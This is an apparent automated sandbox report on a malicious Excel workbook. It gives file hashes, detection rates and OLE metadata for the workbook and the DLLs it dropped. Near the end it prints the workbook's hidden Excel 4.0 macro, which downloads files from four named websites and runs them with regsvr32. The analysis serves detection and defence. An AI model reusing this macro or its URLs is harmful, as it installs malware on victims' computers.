                                                SHA1:CF33171C390F7DD49EC2F740DE5D8DF2B049321C
                                                SHA-256:DE73D53E9FC14A8F8DA68193A7D1412C36D7312D40AD7980D95D8D7D39E3CB78
                                                SHA-512:7E2FC1BF3621AA4279D2AC8C2CB8B1BC06CDE555107CB77AB1CFDDD018FBE39DA2DC81889DF33A7E140E001658C218F482189CBE446D0B81022352B919682982
                                                Malicious:false
                                                Preview:p...... ........I..[.n..(....................................................... ........3k/"[......(...........(...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.3.3.6.b.2.f.2.2.5.b.d.8.1.:.0."...
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):365056
                                                Entropy (8bit):7.158106334231925
                                                Encrypted:false
                                                SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTZA0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TjRIvgMSS3AyUrhYu3j
                                                MD5:BE9AB3CBCD3C659212F266325283997D
                                                SHA1:8AE66E545E3F39473BE65759BE466D48448F385C
                                                SHA-256:278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                                                SHA-512:48058CE87D6A2813C60852B435BC43D7F64D0180A63F9F5964123C0009FC4060216749FBE32DF6FC60BC35E139E4B2D24320AEF526BF12A8A57473203B4F942D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 56%
                                                Joe Sandbox View:
                                                • Filename: AGK-010522 MJEY-210522.xls, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):365056
                                                Entropy (8bit):7.158099808823071
                                                Encrypted:false
                                                SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TrRIvgMSS3AyUrhYu3j
                                                MD5:F11EBAFE4C3C0069090023A6B4CAEC35
                                                SHA1:3FECC4BC39FA6F17F062473D80F51AAEF8B442DB
                                                SHA-256:CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                                                SHA-512:425ED0A65526F11EADC37C8158C2D53C6A07C234DA59594DEEC8C8B132B6673534371A149CD5EA586ED07B0A517011E6143CE41E5D4D93608208C1DC73880F18
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 41%
                                                Joe Sandbox View:
                                                • Filename: AGK-010522 MJEY-210522.xls, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:downloaded
                                                Size (bytes):365056
                                                Entropy (8bit):7.158106332990621
                                                Encrypted:false
                                                SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTb0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TWRIvgMSS3AyUrhYu3j
                                                MD5:8516983EEDC8690C1495B828B4262A63
                                                SHA1:BDD250044234E53E9F08DB444A1DE00987735930
                                                SHA-256:90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                                                SHA-512:C5B6A37A787A70E70BE8614F957C183547B85DFA0913B746F6BC701CEC09BD54E04FB53443DFEFFEDCF83176F581E6A5F4DE06219A1FA6D9D015691E9432CD93
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: Metadefender, Detection: 29%, Browse
                                                • Antivirus: ReversingLabs, Detection: 59%
                                                Joe Sandbox View:
                                                • Filename: AGK-010522 MJEY-210522.xls, Detection: malicious, Browse
                                                IE Cache URL:http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):5
                                                Entropy (8bit):1.5219280948873621
                                                Encrypted:false
                                                SSDEEP:3:hn:h
                                                MD5:FDA44910DEB1A460BE4AC5D56D61D837
                                                SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                                                SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                                                SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                                                Malicious:false
                                                Preview:0....
                                                Process:C:\Windows\System32\regsvr32.exe
                                                File Type:Microsoft Cabinet archive data, 61480 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):61480
                                                Entropy (8bit):7.9951219482618905
                                                Encrypted:true
                                                SSDEEP:1536:kmu7iDG/SCACih0/8uIGantJdjFpTE8lTeNjiXKGgUN:CeGf5gKsG4vdjFpjlYeX9gUN
                                                MD5:B9F21D8DB36E88831E5352BB82C438B3
                                                SHA1:4A3C330954F9F65A2F5FD7E55800E46CE228A3E2
                                                SHA-256:998E0209690A48ED33B79AF30FC13851E3E3416BED97E3679B6030C10CAB361E
                                                SHA-512:D4A2AC7C14227FBAF8B532398FB69053F0A0D913273F6917027C8CADBBA80113FDBEC20C2A7EB31B7BB57C99F9FDECCF8576BE5F39346D8B564FC72FB1699476
                                                Malicious:false
                                                Preview:MSCF....(.......,...................I........y.........Tbr .authroot.stl..$..4..CK..<Tk...c_.d....A.K.....Y.f....!.))$7*I.....e..eKT..k....n.3.......S..9.s.....3H.Mh......qV.=M6.=.4.F.....V:F..]......B`....Q...c"U.0.n....J.....4.....i7s..:.27....._...+).lE..he.4|.?,...h....7..PA..b.,. .....#1+..o...g.....2n1m...=.......Dp.;..f..ljX.Dx..r<'.1RI3B0<w.D.z..)D|..8<..c+..'XH..K,.Y..d.j.<.A.......l_lVb[w..rDp...'.....nL....!G.F....f.fX..r.. ?.....v(...L..<.\.Z..g;.>.0v...P ......|...A..(..x...T0.`g...c..7.U?...9.p..a..&..9......sV..l0..D..fhi..h.F....q...y.....Mq].4..Z.....={L....AS..9.....:.:.........+..P.N....EAQ.V. sr.....y.B.`.Efe..8../....$...y-.q.J.......nP...2.Q8...O........M.@\.>=X....V..z.4.=.@...ws.N.M3.S.c?.....C4]?..\.K.9......^...CU......O....X.`........._.gU...*..V.{V6..m..D.-|.Q.t.7.....9.~....[...I.<e...~$..>......s.I.S....~1..IV.2Ri:..]R!8...q...l.X.%.)@......2.gb,t...}..;...@.Z..<q..y..:...e3..cY.we.$....z..| .#.......I...
                                                Process:C:\Windows\System32\regsvr32.exe
                                                File Type:data
                                                Category:modified
                                                Size (bytes):162196
                                                Entropy (8bit):6.301436092020807
                                                Encrypted:false
                                                SSDEEP:1536:Nga6crtilgCyNY2Ip/5ib6NWdm1wpzru2RPZz04D8rlCMiB3XlMc:Na0imCy/dm0zru2RN97MiVGc
                                                MD5:E721613517543768F0DE47A6EEEE3475
                                                SHA1:3FFC13E3157CF6EB9E9CCAB57B9058209AF41D69
                                                SHA-256:3163B82D1289693122EF99ED6C3C1911F68AA2A7296907CEBF84C897141CED4E
                                                SHA-512:E097CAB58C5E390FDC2DB03A59329A548A60069804487828B70519A403622260E57F10B09D9DDAEEB3C31491FE32221FB67965C490771A3D42E45EBB8BE26587
                                                Malicious:false
                                                Preview:0..y...*.H.........y.0..yz...1.0...`.H.e......0..i...+.....7.....i.0..i.0...+.....7........SiU[v...220418211447Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):28672
                                                Entropy (8bit):3.430046337073317
                                                Encrypted:false
                                                SSDEEP:768:ODRKpb8rGYrMPe3q7Q0XV5xtezE8vpI8UM+VB9s1X0:OVKpb8rGYrMPe3q7Q0XV5xtezE8vG8Uv
                                                MD5:268EE6A4D8E511858C19684926C5CBC5
                                                SHA1:4406095C22A6FA760F49845B116610756D3FFC01
                                                SHA-256:C3C0646B3FDD86756340917F30A5B4F289095960870A82FBAD8D0033E5056C5E
                                                SHA-512:526EDE142F8B98D56B21E4010018A83657232FA14EA69B53D5073D09E473FFD5E61639F6F53F42D2B4277CF35B9D806EEAFED619C725F2529516D012BFA778F2
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 16:15:56 2022, Security: 0
                                                Category:dropped
                                                Size (bytes):69120
                                                Entropy (8bit):6.450361349538424
                                                Encrypted:false
                                                SSDEEP:1536:gVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+79s1a6YG2jzQ0viPvDNHhA6P:+Kpb8rGYrMPe3q7Q0XV5xtezE8vG8UMT
                                                MD5:A41AF1F71D9637C6F8577DAF09A07E0D
                                                SHA1:1589AFA26A47CE40F5B732BE9E8CE88B1AFCE19D
                                                SHA-256:6FCD01276493FC03886C6741782100B1AED4B8606EC8EF50136EC86E294BA328
                                                SHA-512:7B19146C12F17E992CA638BD35C490D4C56CE3F9F9BE2CD00E6CC3B3220A71E11BFD3DFD9D338C9A7C0620B4CA1F3F36319BABCF57EFFAF1A003309C9DC1649A
                                                Malicious:true
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....userTH B.....a.........=.................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):365056
                                                Entropy (8bit):7.158099808823071
                                                Encrypted:false
                                                SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TrRIvgMSS3AyUrhYu3j
                                                MD5:F11EBAFE4C3C0069090023A6B4CAEC35
                                                SHA1:3FECC4BC39FA6F17F062473D80F51AAEF8B442DB
                                                SHA-256:CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                                                SHA-512:425ED0A65526F11EADC37C8158C2D53C6A07C234DA59594DEEC8C8B132B6673534371A149CD5EA586ED07B0A517011E6143CE41E5D4D93608208C1DC73880F18
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 41%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):365056
                                                Entropy (8bit):7.158106332990621
                                                Encrypted:false
                                                SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTb0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TWRIvgMSS3AyUrhYu3j
                                                MD5:8516983EEDC8690C1495B828B4262A63
                                                SHA1:BDD250044234E53E9F08DB444A1DE00987735930
                                                SHA-256:90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                                                SHA-512:C5B6A37A787A70E70BE8614F957C183547B85DFA0913B746F6BC701CEC09BD54E04FB53443DFEFFEDCF83176F581E6A5F4DE06219A1FA6D9D015691E9432CD93
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: Metadefender, Detection: 29%, Browse
                                                • Antivirus: ReversingLabs, Detection: 59%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):365056
                                                Entropy (8bit):7.158106334231925
                                                Encrypted:false
                                                SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTZA0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TjRIvgMSS3AyUrhYu3j
                                                MD5:BE9AB3CBCD3C659212F266325283997D
                                                SHA1:8AE66E545E3F39473BE65759BE466D48448F385C
                                                SHA-256:278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                                                SHA-512:48058CE87D6A2813C60852B435BC43D7F64D0180A63F9F5964123C0009FC4060216749FBE32DF6FC60BC35E139E4B2D24320AEF526BF12A8A57473203B4F942D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 56%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\regsvr32.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):365056
                                                Entropy (8bit):7.158099808823071
                                                Encrypted:false
                                                SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcT+0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TrRIvgMSS3AyUrhYu3j
                                                MD5:F11EBAFE4C3C0069090023A6B4CAEC35
                                                SHA1:3FECC4BC39FA6F17F062473D80F51AAEF8B442DB
                                                SHA-256:CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                                                SHA-512:425ED0A65526F11EADC37C8158C2D53C6A07C234DA59594DEEC8C8B132B6673534371A149CD5EA586ED07B0A517011E6143CE41E5D4D93608208C1DC73880F18
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 41%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\regsvr32.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):365056
                                                Entropy (8bit):7.158106334231925
                                                Encrypted:false
                                                SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTZA0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVO:i5MR9M6y3TjRIvgMSS3AyUrhYu3j
                                                MD5:BE9AB3CBCD3C659212F266325283997D
                                                SHA1:8AE66E545E3F39473BE65759BE466D48448F385C
                                                SHA-256:278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                                                SHA-512:48058CE87D6A2813C60852B435BC43D7F64D0180A63F9F5964123C0009FC4060216749FBE32DF6FC60BC35E139E4B2D24320AEF526BF12A8A57473203B4F942D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 56%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\regsvr32.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):365056
                                                Entropy (8bit):7.158106332990621
                                                Encrypted:false
                                                SSDEEP:3072:JI0AM0yQkR9M6lglELtJUNjiWGyWcTb0JUiA2tqZ4IvUlDAj7UOjVifSwHEDQVLK:i5MR9M6y3TWRIvgMSS3AyUrhYu3j
                                                MD5:8516983EEDC8690C1495B828B4262A63
                                                SHA1:BDD250044234E53E9F08DB444A1DE00987735930
                                                SHA-256:90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                                                SHA-512:C5B6A37A787A70E70BE8614F957C183547B85DFA0913B746F6BC701CEC09BD54E04FB53443DFEFFEDCF83176F581E6A5F4DE06219A1FA6D9D015691E9432CD93
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 29%, Browse
                                                • Antivirus: ReversingLabs, Detection: 59%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8..ik..ik..ik...k..ik...k..ik..k..ik..hk..ik...k..ik...k..ik...k..ik...k..ikRich..ik................PE..d...v{.b.........." .................5...............................................T....@....................................................P.................................................................................... ...............................text............................... ..`.rdata..T.... ......................@..@.data....7..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................
                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: TYHRETH, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Fri May 20 16:15:56 2022, Security: 0
                                                Entropy (8bit):6.449650247078011
                                                TrID:
                                                • Microsoft Excel sheet (30009/1) 78.94%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                File name:melimar.com.xls
                                                File size:69120
                                                MD5:26fe1a6dbcaedcd92be80daa3f91a595
                                                SHA1:f894d4913c99feb984e4885d46ef3935467b07b0
                                                SHA256:10d164258a05b43017ea2344e234477490adaef157633778e0a2f2f558ef9385
                                                SHA512:27fc4993a4f0e8ff9ad667e107a846e94d97d13de9dd2af1da0cb7377df08d3e9001dee888d0909802dff8ae7450006071378df9e8b1842a7831804af098c826
                                                SSDEEP:1536:nVKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+79s1a6YG2jzQ0viPvDNHhA6W:VKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMa
                                                TLSH:28635A467A59C82DF914D33549D74BA97316FC318FAB0A833225F324AFFD8A05A0761B
                                                File Content Preview:........................>......................................................................................................................................................................................................................................
                                                Icon Hash:e4eea286a4b4bcb4
                                                Document Type:OLE
                                                Number of OLE Files:1
                                                Has Summary Info:
                                                Application Name:Microsoft Excel
                                                Encrypted Document:False
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:True
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:False
                                                Flash Objects Count:0
                                                Contains VBA Macros:False
                                                Code Page:1251
                                                Author:Dream
                                                Last Saved By:TYHRETH
                                                Create Time:2015-06-05 18:19:34
                                                Last Saved Time:2022-05-20 15:15:56
                                                Creating Application:Microsoft Excel
                                                Security:0
                                                Document Code Page:1251
                                                Thumbnail Scaling Desired:False
                                                Company:
                                                Contains Dirty Links:False
                                                Shared Document:False
                                                Changed Hyperlinks:False
                                                Application Version:1048576
                                                General
                                                Stream Path:\x5DocumentSummaryInformation
                                                File Type:data
                                                Stream Size:4096
                                                Entropy:0.404258978601
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t . . . . . E S R S G B 1 . . . . . E G S H R H V 2 . . . . . E S H V G R E R 3 . . . . . P K E K P P G
                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 18 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 d7 00 00 00
                                                General
                                                Stream Path:\x5SummaryInformation
                                                File Type:data
                                                Stream Size:4096
                                                Entropy:0.280796102053
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D r e a m . . . . . . . . . . . T Y H R E T H . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . . \\ l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                General
                                                Stream Path:Workbook
                                                File Type:Applesoft BASIC program data, first line number 16
                                                Stream Size:58850
                                                Entropy:7.09451088117
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . T Y H R E T H B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @ . . . . . . . . . . . " . . .
                                                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 07 00 00 54 59 48 52 45 54 48 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Name:PKEKPPGEKKPGE
                                                Type:4
                                                Final:False
                                                Visible:False
                                                Protected:False
                                                PKEKPPGEKKPGE4False0Falsepre7,5,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vipteck.com/wp-admin/user/B8d6jr4pBND2HExAmI/lJWa95VlQ/","..\uxevr1.ocx",0,0)",F11)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx")",F13)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://salledemode.com/tgroup.ge/x4bc2kL4BzGAeUsVi/","..\uxevr2.ocx",0,0)",F15)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx")",F17)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://airliftlimo.com/wp-admin/iMc/","..\uxevr3.ocx",0,0)",F19)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx")",F21)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kabeonet.pl/wp-admin/VWlAz5vWJNHDb/","..\uxevr4.ocx",0,0)",F23)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx")",F25)=FORMULA("=RETURN()",F29)
                                                Name:PKEKPPGEKKPGE
                                                Type:4
                                                Final:False
                                                Visible:False
                                                Protected:False
